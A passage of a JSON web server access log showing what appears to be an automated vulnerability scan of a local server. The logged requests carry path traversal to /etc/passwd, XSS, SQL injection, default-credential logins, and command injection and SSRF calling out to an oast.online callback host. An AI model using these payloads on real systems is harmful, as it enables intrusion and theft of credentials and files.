"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://c9v8gc8smpv8b0ng0t00erfn366a87hsy.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.424","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22objs\x22: [{\x22FID\x22: \x22init\x22}], \x22SID\x22: \x22|wget http://c9v8gc8smpv8b0ng0t00jbxizb3cnbetn.oast.online|\x22, \x22browser\x22: \x22gecko_linux\x22, \x22backend_version\x22: -1, \x22loc\x22: \x22\x22, \x22_cookie\x22: null, \x22wdebug\x22: 0, \x22RID\x22: \x221629210675639_0.5000855117488202\x22, \x22current_uuid\x22: \x22\x22, \x22ipv6\x22: true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /var HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFtFjR564YD4wkAjffjqnUk0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MFuBMWMIOdd5VrStMwO1Zcqr=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MFuBMWMIOdd5VrStMwO1Zcqr=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mongo-express/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 